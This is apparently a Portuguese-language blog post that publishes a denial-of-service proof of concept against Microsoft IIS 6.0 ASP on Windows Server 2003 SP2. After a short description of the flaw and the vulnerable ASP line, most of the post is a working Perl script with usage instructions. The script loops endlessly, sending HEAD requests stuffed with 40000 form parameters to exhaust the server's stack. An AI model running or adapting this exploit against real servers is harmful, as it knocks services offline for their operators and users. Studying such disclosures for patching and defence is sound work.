Assinatura RSS

Arquivo da tag: Stack

Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) DoS

Publicado em

Produto afetado: Microsoft IIS 6.0
Exploit testado em:Windows Server 2003 SP2

Detalhes:

<% Dim variable variable = Request.Form(“FOOBAR”) %>

A variável faz uma requisição que suporta um limite de 40000 caracteres, se posto a mais que isso entrará em crash:

PoC Exploit

# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl
use IO::Socket;
$|=1;
$host = $ARGV[0];
$script = $ARGV[1];
while(1) {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
$write = "C=A&" x 40000;
print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
."Content-Length:". length($write) ."\r\n\r\n" . $write;
print ".";
while(<$sock>) {
print;
}
}

É por essas que eu gosto do apache ;o)